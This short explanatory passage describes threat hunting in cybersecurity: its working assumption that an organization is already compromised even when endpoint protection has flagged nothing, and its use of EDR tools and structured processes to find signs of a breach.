While many organizations utilize cybersecurity solutions like endpoint protection platforms (EPP), around 10% of cyberthreats – including new, unknown and evasive threats such as many types of ransomwares – are capable of bypassing these defences.
Threat hunting works on the assumption that although an organization’s existing security controls haven’t detected or reported anything, the organization has in fact been compromised and some kind of threat is already in the system.
Threat hunting then uses tools including endpoint detection and response (EDR) and clearly defined and structured processes to spot the telltale signs that a breach has occurred and identify it.